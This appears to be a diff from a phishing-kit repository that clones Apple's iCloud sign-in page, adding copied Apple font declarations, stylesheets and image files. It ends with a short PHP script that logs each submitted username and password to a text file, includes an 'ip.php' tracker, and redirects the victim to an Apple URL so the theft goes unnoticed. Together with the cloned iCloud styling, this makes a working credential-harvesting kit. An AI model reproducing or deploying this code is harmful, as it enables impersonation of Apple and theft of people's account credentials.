src:url("/wss/fonts/SF-Pro-Icons/v1/SFProIcons_medium.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Icons';
font-style:normal;
font-weight:600;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Icons/v1/SFProIcons_semibold.woff") format("woff"), url("/wss/fonts/SF-Pro-Icons/v1/SFProIcons_semibold.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Icons 600';
src:url("/wss/fonts/SF-Pro-Icons/v1/SFProIcons_semibold.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Icons';
font-style:normal;
font-weight:400;
src:url("/wss/fonts/SF-Pro-Icons/v1/SFProIcons_regular.eot");
src:local('☺︎'), url("/wss/fonts/SF-Pro-Icons/v1/SFProIcons_regular.woff") format("woff"), url("/wss/fonts/SF-Pro-Icons/v1/SFProIcons_regular.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}

Binary file not shown.

After

Width:  |  Height:  |  Size: 9.2 KiB

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.2 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 9.8 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 4.8 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.8 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 6.2 KiB

View File

@ -0,0 +1,3 @@
/**
Performance Metrics file
*/

Binary file not shown.

After

Width:  |  Height:  |  Size: 16 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 6.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 27 KiB

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1 @@
.sc-pane .alert-pane-detail{margin:2px}.sc-pane .alert-pane-detail .border{position:absolute;top:0px;left:0px;bottom:0px;right:0px;border:1px;border-style:solid;border-color:#bdbdbd;border-radius:2px;-webkit-appearance:none !important;-webkit-transition-property:box-shadow, border;-moz-transition-property:box-shadow, border;transition-property:box-shadow, border;-webkit-transition-duration:0.35s;-moz-transition-duration:0.35s;transition-duration:0.35s;outline:none;box-shadow:inset 0px 1px 0px 0px #eaeaea, 0px 1px 0px 0px #f7f7f7;-webkit-box-shadow:inset 0px 1px 0px 0px #eaeaea, 0px 1px 0px 0px #f7f7f7;-moz-box-shadow:inset 0px 1px 0px 0px #eaeaea, 0px 1px 0px 0px #f7f7f7}.sc-pane .error-details{font-size:11px;color:#474747;font-family:Monaco, Courier New;overflow:auto;overflow-y:scroll;overflow-x:hidden;text-rendering:auto;width:100%;height:100%;border:none;resize:none}

View File

@ -0,0 +1,5 @@
.tz-pointer{background-image: url('https://icloud.cdn-apple.com/system/cloudos/1812Project43/cloudos_foundation/language/1812Project43/en-us/stylesheet-1.png');
background-position: 0px -162px;
background-repeat:no-repeat}.cw-timezone-cityname-button{background-color:#ECEFF4;-webkit-border-radius:5px;-moz-border-radius:5px;border-radius:5px}.windows.webkit.hi-in .cw-timezone-cityname-button.sc-tiny-size.square.button .sc-button-label{line-height:19px}.windows.mozilla.hi-in .cw-timezone-cityname-button.sc-tiny-size.square.button .sc-button-label,.windows.msie.hi-in .cw-timezone-cityname-button.sc-tiny-size.square.button .sc-button-label{line-height:17px}.tz-image-view .sel-div,.tz-image-view .hover-div,.tz-image-view .bg{position:absolute;top:0px;left:0px;width:308px;height:162px}.tz-image-view .hover-div{opacity:0.5}.tz-image-view .bg{background-image: url('https://icloud.cdn-apple.com/system/cloudos/1812Project43/cloudos_foundation/language/1812Project43/en-us/stylesheet-1.png');
background-position: 0px 0px;
background-repeat:no-repeat}.tz-content{border-radius:5px;-webkit-border-radius:5px;-moz-border-radius:5px}

View File

@ -0,0 +1,11 @@
.cw-timezone-picker .tz-image-view{border-radius:4px;box-sizing:border-box}.language-picker-scroll-view:hover .sc-scroller-view .thumb,.language-picker-scroll-view:active .sc-scroller-view .thumb{opacity:1;z-index:2}.auth-firstrun-view .sc-scroll-view.cw-grouped.cw-sectioned-view,.auth-firstrun-view .ios-modal.panel.cw-panel-pane .sc-view.sc-scroll-view.cw-grouped.cw-sectioned-view{background:transparent}.auth-firstrun-view .cw-sectioned-view .cw-section-row{border-top:0px solid transparent}.auth-firstrun-view .cw-sectioned-view .cw-section-row .next-image-container{position:absolute;width:20px;height:20px;right:1px;top:11px}.auth-firstrun-view .cw-sectioned-view .cw-section-row.cw-last-row .next-image-container{margin-top:1px}.auth-firstrun-view .next-image-container>img{position:absolute;top:0px;width:100%;height:100%;left:0px}.auth-firstrun-view .sc-label-view.user-name{overflow:visible;text-align:center;color:white;white-space:nowrap;text-overflow:ellipsis}.auth-firstrun-view .iosPhoto.photo-icon .iosPhoto.add-photo{color:black}.auth-firstrun-view .cw-sectioned-view .cw-section-row.cw-selection-blue:after{bottom:auto;top:0px}.auth-firstrun-view .cw-sectioned-view .cw-section-row.cw-selection-blue.cw-first-row:after{display:none}.auth-firstrun-view .cw-sectioned-view.cw-grouped.sc-view .cw-section-row{background:transparent !important;width:360px;margin:auto}.auth-firstrun-view .cw-sectioned-view .cw-section-row .cw-accessory.sc-label-view.first-run-text{font-weight:500;font-size:19px;color:white;line-height:26px;margin-right:10px;box-sizing:border-box;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;-webkit-font-smoothing:antialiased}.auth-firstrun-view .timezone-cell .cw-text{width:200px;box-sizing:border-box}.auth-firstrun-view .first-run-text .cw-content .cw-text{font-size:19px;color:white;margin-left:-17px;line-height:44px !important;-webkit-font-smoothing:antialiased}.auth-firstrun-view .cw-sectioned-view .cw-section-row.cw-selection-blue .cw-accessory.sc-label-view.first-run-text,.auth-firstrun-view .first-run-text.cw-selection-blue .cw-content .cw-text{color:rgba(255,255,255,0.75)}.auth-firstrun-view .cw-sectioned-view .cw-section-row.cw-first-row.first-run-text .cw-content .cw-text,.auth-firstrun-view .cw-sectioned-view .cw-section-row.cw-first-row.first-run-text{margin-top:-1px}.auth-firstrun-view .cw-sectioned-view .cw-section-row.cw-first-row{border-top:1px solid rgba(255,255,255,0.3)}.auth-firstrun-view .cw-sectioned-view .cw-section-row.cw-last-row{border-bottom:1px solid rgba(255,255,255,0.3)}.auth-firstrun-view .cw-sectioned-view .cw-section-row::before{left:0px;background:rgba(255,255,255,0.3)}.auth-firstrun-view .cw-sectioned-view .cw-section-row::after{background:rgba(255,255,255,0.3);display:none}.borderless.sc-button-view.button.first-run-done-button{font-size:19px;font-weight:500}.borderless.sc-button-view.button.first-run-done-button .sc-button-label{color:white}.borderless.sc-button-view.button.first-run-done-button.active .sc-button-label{color:rgba(255,255,255,0.75)}.borderless.sc-button-view.button.first-run-done-button .next-image-container{position:relative;display:inline-block;top:0px;width:10px;height:15px;left:0px;margin-left:5px}.iosPhoto.photo-icon{cursor:pointer;-webkit-border-radius:50%;-moz-border-radius:50%;border-radius:50%;z-index:92}.iosPhoto.photo-icon.disabled{cursor:default}.chrome .iosPhoto.photo-icon{overflow:visible}.iosPhoto.photo-icon:before{z-index:93;content:'';left:0px;right:0px;top:0px;bottom:0px;position:absolute;background-image: url('https://icloud.cdn-apple.com/system/cloudos/1812Project43/cloudos_foundation/language/1812Project43/en-us/stylesheet-1.png');
background-position: 0px 0px;
background-repeat:no-repeat}.iosPhoto.photo-icon.hovering{z-index:92}.iosPhoto.photo-icon.hovering:before{z-index:94;content:'';left:0px;right:0px;top:0px;bottom:0px;position:absolute;background-image: url('https://icloud.cdn-apple.com/system/cloudos/1812Project43/cloudos_foundation/language/1812Project43/en-us/stylesheet-1.png');
background-position: 0px -118px;
background-repeat:no-repeat;opacity:0.9}.iosPhoto.photo-icon .add-photo{color:#007aff;text-align:center;font-weight:300;font-size:17px;background-image: url('https://icloud.cdn-apple.com/system/cloudos/1812Project43/cloudos_foundation/language/1812Project43/en-us/stylesheet-1.png');
background-position: 0px -236px;
background-repeat:no-repeat}.iosPhoto.photo-icon .add-photo .text-photo{text-align:center;border:0px;padding:0px 5px}.iosPhoto.photo-icon .edit-text{color:#ffffff}.delete-photo{z-index:93}.addDelete.delete-icon{background-image: url('https://icloud.cdn-apple.com/system/cloudos/1812Project43/cloudos_foundation/language/1812Project43/en-us/stylesheet-1.png');
background-position: 0px -354px;
background-repeat:no-repeat}.addDelete.delete-icon.active{background-image: url('https://icloud.cdn-apple.com/system/cloudos/1812Project43/cloudos_foundation/language/1812Project43/en-us/stylesheet-1.png');
background-position: -21px -354px;
background-repeat:no-repeat}

View File

@ -0,0 +1 @@
.sc-pane.sc-panel.panel.ios-notification .action-buttons{z-index:20;background-color:transparent;background-image:none;float:right}.sc-pane.sc-panel.panel.ios-notification .action-buttons .snooze-button,.sc-pane.sc-panel.panel.ios-notification .action-buttons .dismiss-button{float:right;margin:0px}.sc-pane.sc-panel.panel.ios-notification .action-buttons .snooze-button .sc-button-label,.sc-pane.sc-panel.panel.ios-notification .action-buttons .dismiss-button .sc-button-label{color:#007aff;margin-top:-16px;font-size:16px}.windows .sc-pane.sc-panel.panel.ios-notification .action-buttons .snooze-button .sc-button-label,.windows .sc-pane.sc-panel.panel.ios-notification .action-buttons .dismiss-button .sc-button-label{font-size:15px}.mozilla .sc-pane.sc-panel.panel.ios-notification .action-buttons .snooze-button .sc-button-label,.msie .sc-pane.sc-panel.panel.ios-notification .action-buttons .snooze-button .sc-button-label,.mozilla .sc-pane.sc-panel.panel.ios-notification .action-buttons .dismiss-button .sc-button-label,.msie .sc-pane.sc-panel.panel.ios-notification .action-buttons .dismiss-button .sc-button-label{margin-top:-17px}.safari .sc-pane.sc-panel.panel.ios-notification .action-buttons .snooze-button .sc-button-label,.windows.chrome .sc-pane.sc-panel.panel.ios-notification .action-buttons .snooze-button .sc-button-label,.safari .sc-pane.sc-panel.panel.ios-notification .action-buttons .dismiss-button .sc-button-label,.windows.chrome .sc-pane.sc-panel.panel.ios-notification .action-buttons .dismiss-button .sc-button-label{margin-top:-15px}.sc-pane.sc-panel.panel.ios-notification .action-buttons .dismiss-button :after{top:0px;height:24px}.sc-pane.sc-panel.panel.ios-notification .action-buttons .snooze-button .sc-button-label{padding-left:0px}.sc-pane.sc-panel.panel.ios-notification .message.no-description-text{top:0px;bottom:0px;margin:auto 0px}.sc-pane.sc-panel.panel.ios-notification .message{word-wrap:break-word;overflow:hidden}.windows .sc-pane.sc-panel.panel.ios-notification .message{font-size:15px}.msie .sc-pane.sc-panel.panel.ios-notification .message,.windows.chrome .sc-pane.sc-panel.panel.ios-notification .message{line-height:23px}

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,6 @@
<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: http://icloud.cdn-apple.com');
exit();